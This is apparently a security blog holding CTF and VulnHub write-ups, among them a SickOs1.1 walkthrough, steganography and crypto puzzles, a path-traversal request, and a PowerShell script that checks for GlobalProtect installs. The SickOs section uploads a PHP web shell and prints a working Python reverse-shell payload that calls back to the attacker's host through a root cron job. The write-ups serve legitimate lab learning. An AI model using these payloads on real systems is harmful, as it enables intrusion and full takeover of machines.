SickOs1.1 Writeup

Here is a quick write up for SickOs.1.1 from the vulnhub.com site
https://www.vulnhub.com/entry/sickos-11,132/
Created by D4rk

Run a quick NMAP scan to see what we have to work with.
nmap -Pn 192.168.18.146

Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-08 06:35 PST
Nmap scan report for 192.168.18.146
Host is up (0.0044s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http
8080/tcp closed http-proxy

The squid proxy port looks interesting.  So configure my browser to use the proxy. Once configured I am able to access the internet. Let try accessing the local IP through the proxy.

creenshot

Ok not much to go on here looking at the source of the page show no clues.
Lets run a quick directory scan using dirb and see if anything interesting shows up.

dirb http://192.168.18.146 /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt -p 192.168.18.146:3128

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Tue Dec  8 07:12:14 2015
URL_BASE: http://192.168.18.146/
WORDLIST_FILES: /pentest/intelligence-gathering/dictionary/Discovery/Web_Content/common.txt
PROXY: 192.168.18.146:3128

—————–

GENERATED WORDS: 4592

—- Scanning URL: http://192.168.18.146/ —-
+ http://192.168.18.146/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.18.146/connect (CODE:200|SIZE:109)
+ http://192.168.18.146/index (CODE:200|SIZE:21)
+ http://192.168.18.146/index.php (CODE:200|SIZE:21)
+ http://192.168.18.146/robots (CODE:200|SIZE:45)
+ http://192.168.18.146/robots.txt (CODE:200|SIZE:45)
+ http://192.168.18.146/server-status (CODE:403|SIZE:295)

—————–
END_TIME: Tue Dec  8 07:12:17 2015
DOWNLOADED: 4592 – FOUND: 7

check out robots

User-agent: *
Disallow: /
Dissalow: /wolfcms

/woldcms looks interesting opening in a browser shows.

creenshot 2

I have never heard of wolfcms. Check out expoit-db and I see some vulnerabilities but most seem to require an authenticated user.  So let download the source for wolfcms to see the file structure. From the source I see several directories such as images etc. Looking around those nothing exciting shows up. So we bring up the admin login page determined from the source code.

creenshot 3

Just try the common admin/admin and we are in.

creenshot 4

Now lets see if we can upload my preferred PHP shell b37k to get CLI access. Lets put it in the images directory

creenshot 5

Now lets see if we can access the newly uploaded file.

creenshot 6

We are now in as the www-data user. From the b37k I create a reverse shell back to my self to obtain shell access.

/tmp# nc -lvp 6666
Listening on [0.0.0.0] (family 0, port 6666)
Connection from [192.168.18.146] port 6666 [tcp/*] accepted (family 2, sport 33912)
b374k shell : connected
/bin/sh: 0: can’t access tty; job control turned off
/tmp>ls
b374k_rs
b374k_rs.c
/tmp>whoami
www-data
/tmp>uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
/tmp>

lets look at services and see if anything stands out.

/var/www>ps -aux
Warning: bad ps syntax, perhaps a bogus ‘-‘? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   3536  1892 ?        Ss   20:30   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    20:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    20:30   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    20:30   0:00 [migration/0]
root         8  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    20:30   0:00 [rcu_sched]
root        10  0.0  0.0      0     0 ?        S    20:30   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   20:30   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    20:30   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   20:30   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   20:30   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   20:30   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   20:30   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   20:30   0:00 [kworker/u17:0]
root        18  0.0  0.0      0     0 ?        S<   20:30   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   20:30   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    20:30   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   20:30   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   20:30   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    20:30   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    20:30   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   20:30   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   20:30   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    20:30   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    20:30   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   20:30   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   20:30   0:00 [kthrotld]
root        45  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_0]
root        46  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_1]
root        49  0.0  0.0      0     0 ?        S<   20:30   0:00 [dm_bufio_cache]
root        69  0.0  0.0      0     0 ?        S<   20:30   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   20:30   0:00 [charger_manager]
root        71  0.0  0.0      0     0 ?        S    20:30   0:00 [kworker/0:2]
root       213  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_2]
root       214  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_3]
root       215  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_4]
root       217  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt_poll_0]
root       222  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_5]
root       223  0.0  0.0      0     0 ?        S<   20:30   0:00 [mpt/0]
root       224  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_6]
root       226  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_7]
root       228  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_8]
root       229  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_9]
root       230  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_10]
root       233  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_11]
root       234  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_12]
root       235  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_13]
root       236  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_14]
root       237  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_15]
root       238  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_16]
root       239  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_17]
root       240  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_18]
root       241  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_19]
root       242  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_20]
root       243  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_21]
root       244  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_22]
root       245  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_23]
root       246  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_24]
root       247  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_25]
root       248  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_26]
root       249  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_27]
root       250  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_28]
root       251  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_29]
root       252  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_30]
root       253  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_31]
root       283  0.0  0.0      0     0 ?        S    20:30   0:00 [scsi_eh_32]
root       374  0.0  0.0      0     0 ?        S    20:30   0:00 [jbd2/sda1-8]
root       375  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-rsv-conver]
root       376  0.0  0.0      0     0 ?        S<   20:30   0:00 [ext4-unrsv-conv]
root       470  0.0  0.0   2832   608 ?        S    20:30   0:00 upstart-udev-bridge –daemon
root       473  0.0  0.1   3100  1332 ?        Ss   20:30   0:00 /sbin/udevd –daemon
102        559  0.0  0.0   3256   888 ?        Ss   20:30   0:00 dbus-daemon –system –fork –activation=upstart
syslog     563  0.0  0.1  30164  1580 ?        Sl   20:30   0:00 rsyslogd -c5
root       574  0.0  0.0      0     0 ?        S<   20:30   0:00 [ttm_swap]
root       641  0.0  0.0   2976   764 ?        S    20:30   0:00 /sbin/udevd –daemon
root       642  0.0  0.0   3096   880 ?        S    20:30   0:00 /sbin/udevd –daemon
root       710  0.0  0.0      0     0 ?        S<   20:30   0:00 [kpsmoused]
root       769  0.0  0.0   2844   348 ?        S    20:30   0:00 upstart-socket-bridge –daemon
root       849  0.0  0.0   2924   404 ?        Ss   20:30   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       895  0.0  0.2   6680  2408 ?        Ss   20:30   0:00 /usr/sbin/sshd -D
root      1016  0.0  0.0   4628   844 tty4     Ss+  20:30   0:00 /sbin/getty -8 38400 tty4
root      1021  0.0  0.0   4628   844 tty5     Ss+  20:30   0:00 /sbin/getty -8 38400 tty5
root      1028  0.0  0.0   4628   844 tty2     Ss+  20:30   0:00 /sbin/getty -8 38400 tty2
root      1029  0.0  0.0   4628   848 tty3     Ss+  20:30   0:00 /sbin/getty -8 38400 tty3
root      1036  0.0  0.0   4628   856 tty6     Ss+  20:30   0:00 /sbin/getty -8 38400 tty6
proxy     1061  0.0  1.4  40200 15124 ?        Ss   20:30   0:02 /usr/sbin/squid3 -N -YC -f /etc/squid3/squid.conf
root      1062  0.0  0.0   2172   624 ?        Ss   20:30   0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1063  0.0  0.0   2616   932 ?        Ss   20:30   0:00 cron
daemon    1064  0.0  0.0   2468   352 ?        Ss   20:30   0:00 atd
whoopsie  1084  0.0  0.3  24468  3768 ?        Ssl  20:30   0:00 whoopsie
mysql     1107  0.0  3.3 326184 33976 ?        Ssl  20:30   0:01 /usr/sbin/mysqld
proxy     1125  0.0  0.0   3220   612 ?        Ss   20:30   0:00 (unlinkd)
root      1136  0.0  0.7  37900  7656 ?        Ss   20:30   0:00 /usr/sbin/apache2 -k start
www-data  1172  0.0  0.7  38864  7776 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
www-data  1174  0.0  0.9  39804 10020 ?        S    20:30   0:00 /usr/sbin/apache2 -k start
root      1185  0.0  0.0   4628   848 tty1     Ss+  20:30   0:00 /sbin/getty -8 38400 tty1
www-data  1379  0.0  0.9  40024  9548 ?        S    20:43   0:00 /usr/sbin/apache2 -k start
www-data  1550  0.0  0.8  39768  9052 ?        S    21:36   0:00 /usr/sbin/apache2 -k start
root      1554  0.0  0.0      0     0 ?        S    21:37   0:00 [kworker/u16:1]
www-data  1596  0.0  0.9  40304  9656 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1597  0.0  0.8  40412  8552 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1602  0.0  0.9  40812 10188 ?        S    21:48   0:00 /usr/sbin/apache2 -k start
www-data  1614  0.0  0.9  41964 10224 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1615  0.0  1.0  41312 10532 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
www-data  1616  0.0  0.8  40412  8644 ?        S    21:49   0:00 /usr/sbin/apache2 -k start
root      1666  0.0  0.0      0     0 ?        S    21:55   0:00 [kworker/u16:0]
www-data  1690  0.0  0.0   2232   544 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data  1691  0.0  0.0   2232   284 ?        S    22:00   0:00 /bin/sh -i
root      1694  0.0  0.0      0     0 ?        S    22:00   0:00 [kworker/u16:2]
www-data  1695  0.0  0.0   2232   540 ?        S    22:00   0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data  1696  0.0  0.0   2232   280 ?        S    22:00   0:00 /bin/sh -i
www-data  1767  0.0  0.0   2232   540 ?        S    22:01   0:00 sh -c ./b374k_rs 13123 2>&1
www-data  1768  0.0  0.0   2000   284 ?        S    22:01   0:00 ./b374k_rs 13123
www-data  1775  0.0  0.0   2232   544 ?        S    22:03   0:00 sh -c export TERM=xterm;PS1=’$PWD>’;export PS1;/bin/sh -i
www-data  1776  0.0  0.0   2232   560 ?        S    22:03   0:00 /bin/sh -i
www-data  1790  0.0  0.1   2860  1044 ?        R    22:05   0:00 ps -aux

woopsie looks odd.

Lets take a look at the wolfcms config file.
cat config.php
<?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define(‘DB_DSN’, ‘mysql:dbname=wolf;host=localhost;port=3306’);
define(‘DB_USER’, ‘root’);
define(‘DB_PASS’, ‘john@123’);
define(‘TABLE_PREFIX’, ”);

Nice looking through the mysql tables nothing interesting pops out. Tried the root password via SSH with no luck. So lets look around a bit.

see a file in /var/www called connect.py
#!/usr/bin/python

print “I Try to connect things very frequently\n”
print “You may want to try my services”

Well that looks like a clue. Lets look for something that could launch this like cron.

found a file under /etc/cron.d called automate that runs the connect.py as root.

* * * * * root /usr/bin/python /var/www/connect.py
Lets edit the file to see if we can get a reverse shell via the root user.

Modified automate

#!/usr/bin/python

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“192.168.18.181”,1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call([“/bin/sh”,”-i”]);

 

now start nc listener

nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

Connection from [192.168.18.146] port 1234 [tcp/*] accepted (family 2, sport 34262)
/bin/sh: 0: can’t access tty; job control turned off
# # ls
a0216ea4d51874464078c618298b1367.txt
# whoami
root
# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

this was a lot of fun thanks for creating D4rk!

9447 CTF – 2015

Another great CTF again this year. 9447 ran smooth. I did not notice any challenge issues. Typical challenge categories web, misc, reverse, exploit, and stego.  All challenges were very good. Here is a short write up to the two challenges I was able to complete. I Look forward to next years CTF!

 
imaged (90pts) 1 day, 22 hours, 6 minutes, 9 seconds remaining Our spies found this image. They think something is hidden in it… what could it be?

Image is just a plain rectangle box PNG

imaged

Ran through the normal tools

pngcheck imaged.png
OK: imaged.png (2997×14595, 4-bit palette, non-interlaced, -0.2%).

ran through strings
strings imaged.png | more
IHDR
9447
0PLTE
H40t
0l(t
{Ste
IDATx

I see the 9447 start of what looks like a flag so open it up in a hex editor

hex

I see the 9447 but nothing after it looks like a flag. Looked up the PNG specs all the pieces seem to be there nothing extra/optional in the images. Then I just started looking at each chunk header just to validate
Again non of the optionals are there. But there is a number if IDAT entries. And just 8 bytes before the first one I see a {Ste
That looks a little like a flag. So I search for the next one
and its g0_r
then the next one edun
and so on and so on until I come up with the flag. SCORE!

flag is 9447{Steg0_redunDaNcy_CHeck}

———————————————————————–
YWS (130pts) 1 day, 23 hours, 15 minutes, 17 seconds remaining My friend wrote a cool web server. I’m sure he’s stored some great doxxxs on the website. Can you take a look and report back any interesting things you find?

The web page is at http://yws-fsiqc922.9447.plumbing

start BURP proxy
start clicking through BURP discovered link for flag URL

doing a
GET /.. HTTP/1.1
Host: yws-fsiqc922.9447.plumbing
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

response

HTTP/1.1 200 OK
Server: BWS 0.1
Content-Length: 336
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>Directory listing for /..</title>
</head>
<body>
<h2>Directory listing for /..</h2>
<hr>
<ul>
<li><a href=”/../9447{D1rect0ries_ARe_h4rd}”>9447{D1rect0ries_ARe_h4rd}</a>
<li><a href=”/../.”>.</a>
<li><a href=”/../..”>..</a>
<li><a href=”/../gws”>gws</a>
<li><a href=”/../files”>files</a>
</ul>
<hr>
</body>
</html>

funny going to /.. with a browser did not display the page. Just sent us back to the main page.

FLAG IS
9447{D1rect0ries_ARe_h4rd}

 

BSides BOSTON – Common misconfigurations that lead to a breach Justin Tharpe

One of our capture the flag team members had a talk at BSides Boston check it out.

Palo Alto Networks Global Protect check Script

I had a customer that wanted to make sure that the Global Protect Client was installed on every windows machine on their domain. To fill this need I created a Power Shell script that scans a list of ip subnets from a text file determines what hosts are up and then checks these hosts for a Global Protect installation by looking for a specific file.

Keep in mind I am not a Power Shell guru (lots of google searching when creating this) so I am sure there are many enhancements that can be made such as multi thread and the like. At any rate hopefully someone else can make use of this. Use at your own risk.

 

#
# 2015-04-06 GP-scan.ps1
# disclaimer I am not a powershell expert just hacked this together to meet the need.
# Script Created by Brian Hitchcock to scan defined network ranges for live hosts then check for GLobal Protect install files.
#
# Script will need to be ran by a user that has permissions to the end machines file system to verify the file is in place.
#
# c:\script\networks.txt File containing /24 networks to check in format 192.168.0 no ending . not extra spaces
# 192.168.0
# 10.10.0.
# c:\script\ips.txt File that is created from ping scan for live hosts. File is over written at each script run

function check-remotefile {

PROCESS {
$file = “\\$_\c$\Program Files\Palo Alto Networks\GlobalProtect\pinfo.dat”
if (test-path $file)
{
write-host “GP installed ” -nonewline
echo $_
}
else
{
write-host “!GP not installed ” -nonewline
echo $_
}
}
}

# Create ips.txt file
echo ” GP-scan by Brian Hitchcock”
echo “Scanning for hosts”
echo ” ” | Out-File c:\script\ips.txt

# loop through networks.txt file do ping scans and write live hosts to ips.txt file
foreach ($network in Get-Content c:\script\networks.txt) {
1..254 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send(“$network.$_”) } | where-object {$_.Status -eq “success”} | select Address | format-table Address -autosize -hidetableheaders | Out-File c:\script\ips.txt -Append
}

# remove blank lines from ips.txt
( Get-Content c:\script\ips.txt ) | Where { $_.Trim(” `t”) } | Set-Content c:\script\ips.txt

echo “Check live hosts for Global Protect”
# check host for Global Protect file
Get-Content c:\script\ips.txt | check-remotefile

 

#####################
Sample run
######################

PS C:\script> .\gp-scan.ps1
GP-scan by Brian Hitchcock
Scanning for hosts
Check live hosts for Global Protect
!GP not installed 192.168.18.1
!GP not installed 192.168.18.2
!GP not installed 192.168.18.3
!GP not installed 192.168.18.4
GP installed 192.168.18.5
!GP not installed 192.168.18.10
!GP not installed 192.168.18.130
!GP not installed 192.168.18.251
!GP not installed 192.168.18.252
!GP not installed 10.20.10.7
!GP not installed 10.20.10.8
!GP not installed 10.20.10.9
!GP not installed 10.20.10.12
!GP not installed 10.20.10.13
!GP not installed 10.20.10.14
!GP not installed 10.20.10.16

 

PragyanCTF

Another nice CTF. This one was pretty laid back went for over a weeks time.  Seemed to have a lot of Stego and crypto challenges pretty low on an type of reverse or forensics. Everything seems to have gone smoothly I didn’t notice any issues. Some members of OverflowSecurity were in and out of the challenges. Here are the write ups for the ones that I completed.

STEGO

Put on your reading glasses (10 pts)
run strings on file. flag is on the bottom

strings Proxy.jpg

M}EU]sF
1Z5;”A
kjiFF
16bbee7466db38dad50701223d57ace8

 

What you see is what you get. (50 pts)

run strings the bottom shows us the program used and key to extract

#strings stego_50.jpg
:W9K
QIK@
RP!h
usethisUT
steghide.sourceforge.net/download.phpPK
usethisUT
Delta_Force\m/

steghide –extract -sf stego_50.jpg
Enter passphrase:
wrote extracted data to “key_stego_1”.
root@kali:~/CTF/pragyan/stego/what-you-see-is-what-you-get# ls
key_stego_1 stegcrack.pl stego_50.jpg
root@kali:~/CTF/pragyan/stego/what-you-see-is-what-you-get# cat key_stego_1
Congrats! This was way too wasy 😛

This is the key:

PrAgyaNCTF_sTeg1_key

 

CRYPTO

One more headache (20 pts)

This is a PRGYAN event
text file called substitution given with the following text
dhkuagsn
assuming that PRGYAN is the key

used an online decoder
http://www.braingle.com/brainteasers/codes/keyword.php

entered key: prgyanpr cipher text: dhkuagsn

solution: ilovectf

 

FORENSICS
Access Code (30pts)
Find the access code

a PDF is shown

pdg-image

 

RIP JPEG from PDF ( can right click and save it)

this is the JPEG

out-000

Did a google image search via drag and drop image into search box and find the artist name is Sascha Herm

The PDF said KEYED painter so go to online keyword cipher decoder
http://www.braingle.com/brainteasers/codes/keyword.php

use KEY: saschahermsasch
with Cipher Text: heitsctrnpsmysk
and get the flag: deltactfpragyan

 

MISC
Totally abstruse (30 pts)

no point guessing

was given an image.

world

A goggle image  search on this images brought up the Piet programming language.
found an online interpreter at
http://www.bertnase.de/npiet/npiet-execute.php

execute the image/code

Hi,
Welcome to npiet online !

Info: upload status: Ok
Info: found picture width=115 height=115 and codel size=5
Uploaded picture (shown with a small border): world.png

Info: executing: npiet -e 1000000 world.png

Hello, world!

Flag: Hello, world!

 

HackIM 2015

Another good CTF. I found it very challenging.  Most of my team was not able to participate so we did not do well. I was only able to solve one problem myself but was on the right track it seems on several others. I’m sure if we had more team members participating we could have put our minds together and solved more.

 

Forensics 300

mount -o loop FOR-300 /media/image

ls -laf

There is a .sh on the root directory that created random directories and files.

 

total 84K
-rw-r–r– 1 root root 4.9K Dec 31 1969 02CdWGSxGPX.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 0GY1l
drwxr-xr-x 1 root root 0 Dec 31 1969 0h3a5
drwxr-xr-x 1 root root 0 Dec 31 1969 0l
drwxr-xr-x 1 root root 0 Dec 31 1969 0qsd
drwxr-xr-x 1 root root 0 Dec 31 1969 0wDq5
drwxr-xr-x 1 root root 0 Dec 31 1969 0Xs
drwxr-xr-x 1 root root 0 Dec 31 1969 1
drwxr-xr-x 1 root root 0 Dec 31 1969 2X
drwxr-xr-x 1 root root 0 Dec 31 1969 3
drwxr-xr-x 1 root root 0 Dec 31 1969 3J
drwxr-xr-x 1 root root 0 Dec 31 1969 44aAm
drwxr-xr-x 1 root root 0 Dec 31 1969 4A
drwxr-xr-x 1 root root 0 Dec 31 1969 4c
drwxr-xr-x 1 root root 0 Dec 31 1969 4CfVyuIW
drwxr-xr-x 1 root root 0 Dec 31 1969 4CQU
drwxr-xr-x 1 root root 208 Dec 31 1969 5Iuc
drwxr-xr-x 1 root root 260 Dec 31 1969 5U7WRf
-rw-r–r– 1 root root 19K Dec 31 1969 5ySfqnmFgFQd6il.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 6JR3
drwxr-xr-x 1 root root 124 Dec 31 1969 6wUaZE1vbsW
drwxr-xr-x 1 root root 0 Dec 31 1969 75c083YdQf
drwxr-xr-x 1 root root 0 Dec 31 1969 7H7geLlS5
drwxr-xr-x 1 root root 0 Dec 31 1969 8A2MFawD4
drwxr-xr-x 1 root root 0 Dec 31 1969 8DQFirm0D
drwxr-xr-x 1 root root 0 Dec 31 1969 8HhWfV9nK1
drwxr-xr-x 1 root root 0 Dec 31 1969 8nwg
drwxr-xr-x 1 root root 0 Dec 31 1969 8RxQG4bvd
drwxr-xr-x 1 root root 0 Dec 31 1969 95D
drwxr-xr-x 1 root root 2.3K Dec 31 1969 a
drwxr-xr-x 1 root root 0 Dec 31 1969 aCIzN8I5
drwxr-xr-x 1 root root 0 Dec 31 1969 acy
drwxr-xr-x 1 root root 0 Dec 31 1969 Ad1CAg
drwxr-xr-x 1 root root 0 Dec 31 1969 aE
drwxr-xr-x 1 root root 0 Dec 31 1969 b
drwxr-xr-x 1 root root 268 Dec 31 1969 b0dNwf3bNy
drwxr-xr-x 1 root root 0 Dec 31 1969 b66
-rw-r–r– 1 root root 11K Dec 31 1969 B6IdX6a.bin
drwxr-xr-x 1 root root 284 Dec 31 1969 BY
-rw-r–r– 1 root root 12K Dec 31 1969 BYqYsXqp.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 C
drwxr-xr-x 1 root root 0 Dec 31 1969 CEBIjqOoYttzQ
drwxr-xr-x 1 root root 0 Dec 31 1969 cOyWvykD1l1
drwxr-xr-x 1 root root 0 Dec 31 1969 cQLp9t6svJj
drwxr-xr-x 1 root root 0 Dec 31 1969 cTFarHjM
drwxr-xr-x 1 root root 0 Dec 31 1969 d2
drwxr-xr-x 1 root root 216 Dec 31 1969 dG7pHp24fl
drwxr-xr-x 1 root root 0 Dec 31 1969 DGcf
drwxr-xr-x 1 root root 0 Dec 31 1969 doKP
drwxr-xr-x 1 root root 144 Dec 31 1969 dontD0AnythingHERE
drwxr-xr-x 1 root root 0 Dec 31 1969 DS33Meg
drwxr-xr-x 1 root root 260 Dec 31 1969 duKt4ZJ
drwxr-xr-x 1 root root 0 Dec 31 1969 e
drwxr-xr-x 1 root root 0 Dec 31 1969 Ebnpv
drwxr-xr-x 1 root root 0 Dec 31 1969 F
drwxr-xr-x 1 root root 0 Dec 31 1969 FdnSdaQwA
drwxr-xr-x 1 root root 0 Dec 31 1969 FfrD0o
drwxr-xr-x 1 root root 0 Dec 31 1969 FinD
drwxr-xr-x 1 root root 0 Dec 31 1969 fm
drwxr-xr-x 1 root root 0 Dec 31 1969 g
drwxr-xr-x 1 root root 0 Dec 31 1969 gtj
drwxr-xr-x 1 root root 0 Dec 31 1969 h
drwxr-xr-x 1 root root 0 Dec 31 1969 H
drwxr-xr-x 1 root root 0 Dec 31 1969 H2Zj8FNbu
drwxr-xr-x 1 root root 0 Dec 31 1969 hdi7
drwxr-xr-x 1 root root 0 Dec 31 1969 hYuPvID
drwxr-xr-x 1 root root 0 Dec 31 1969 i
drwxr-xr-x 1 root root 132 Dec 31 1969 imgLDPt4BY
drwxr-xr-x 1 root root 0 Dec 31 1969 ix1EMRHRpIc2
drwxr-xr-x 1 root root 0 Dec 31 1969 j6uLMX
drwxr-xr-x 1 root root 0 Dec 31 1969 jE
drwxr-xr-x 1 root root 0 Dec 31 1969 jj
drwxr-xr-x 1 root root 0 Dec 31 1969 junk
drwxr-xr-x 1 root root 0 Dec 31 1969 JUr
drwxr-xr-x 1 root root 0 Dec 31 1969 K2QWa5
drwxr-xr-x 1 root root 116 Dec 31 1969 k6
drwxr-xr-x 1 root root 0 Dec 31 1969 k6B4zgvO9Ee
drwxr-xr-x 1 root root 0 Dec 31 1969 kNJSs
drwxr-xr-x 1 root root 0 Dec 31 1969 KS
drwxr-xr-x 1 root root 0 Dec 31 1969 KxEQM
drwxr-xr-x 1 root root 0 Dec 31 1969 LG6F
drwxr-xr-x 1 root root 0 Dec 31 1969 Lh
-rw-r–r– 1 root root 2.1K Dec 31 1969 LlC6Z0zrgy.bin
drwxr-xr-x 1 root root 0 Dec 31 1969 LO0J8
drwx—— 1 root root 0 Dec 31 1969 lost+found
drwxr-xr-x 1 root root 0 Dec 31 1969 LvuGM
drwxr-xr-x 1 root root 0 Dec 31 1969 lWIRfzP
drwxr-xr-x 1 root root 0 Dec 31 1969 m
drwxr-xr-x 1 root root 0 Dec 31 1969 m9V0lIaElz
drwxr-xr-x 1 root root 0 Dec 31 1969 MiU
drwxr-xr-x 1 root root 0 Dec 31 1969 Mnuc
drwxr-xr-x 1 root root 0 Dec 31 1969 n
drwxr-xr-x 1 root root 208 Dec 31 1969 NgzQPW
drwxr-xr-x 1 root root 0 Dec 31 1969 Nv
drwxr-xr-x 1 root root 0 Dec 31 1969 o
drwxr-xr-x 1 root root 0 Dec 31 1969 O7avZhikgKgbF
drwxr-xr-x 1 root root 0 Dec 31 1969 o8
drwxr-xr-x 1 root root 0 Dec 31 1969 OOoOs
drwxr-xr-x 1 root root 148 Dec 31 1969 orcA
drwxr-xr-x 1 root root 0 Dec 31 1969 oSx2p
drwxr-xr-x 1 root root 0 Dec 31 1969 OT
drwxr-xr-x 1 root root 108 Dec 31 1969 poiuy7Xdb
drwxr-xr-x 1 root root 0 Dec 31 1969 px6u
drwxr-xr-x 1 root root 0 Dec 31 1969 Q
drwxr-xr-x 1 root root 224 Dec 31 1969 qkCN8
drwxr-xr-x 1 root root 0 Dec 31 1969 QmUY1d
drwxr-xr-x 1 root root 240 Dec 31 1969 QQY3sF63w
drwxr-xr-x 1 root root 0 Dec 31 1969 r
drwxr-xr-x 1 root root 0 Dec 31 1969 Raf3SYj
-rw-r–r– 1 root root 4.2K Dec 31 1969 ran2.sh
drwxr-xr-x 1 root root 256 Dec 31 1969 rhZE1LZ6g
drwxr-xr-x 1 root root 0 Dec 31 1969 Ruc9
drwxr-xr-x 1 root root 0 Dec 31 1969 RZTOGd
drwxr-xr-x 1 root root 0 Dec 31 1969 scripts
-rw-r–r– 1 root root 0 Dec 31 1969 sdb.cramfs
drwxr-xr-x 1 root root 0 Dec 31 1969 sn
drwxr-xr-x 1 root root 0 Dec 31 1969 SPaK8l2sYN
drwxr-xr-x 1 root root 0 Dec 31 1969 SrZznhSAj
drwxr-xr-x 1 root root 0 Dec 31 1969 t
drwxr-xr-x 1 root root 0 Dec 31 1969 T
-rw-r–r– 1 root root 2.2K Dec 31 1969 TFGVOSwYd.txt
